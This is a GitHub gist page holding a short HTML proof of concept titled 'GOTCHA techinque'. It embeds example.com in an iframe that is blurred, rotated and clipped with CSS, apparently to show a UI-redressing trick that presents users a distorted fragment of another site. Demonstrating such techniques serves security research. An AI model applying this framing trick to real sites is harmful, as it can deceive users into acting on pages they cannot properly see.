Skip to content

Instantly share code, notes, and snippets.

@jimen0
Created June 28, 2019 10:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jimen0/a33eca0ad9220761d36ce8e3b0d512e5 to your computer and use it in GitHub Desktop.
Save jimen0/a33eca0ad9220761d36ce8e3b0d512e5 to your computer and use it in GitHub Desktop.

GOTCHA techinque PoC

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device;height=device">
  <title>GOTCHA PoC</title>
  <style>
    iframe {
      margin: 4rem;
      filter: blur(2px);
      transform: rotate(20deg);
      
      width: 200px;
      height: 200px;
      position: absolute;
      clip: rect(40px,170px,80px,10px);
    }
  </style>
</head>

<body>

<iframe src="https://example.com">
</iframe>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment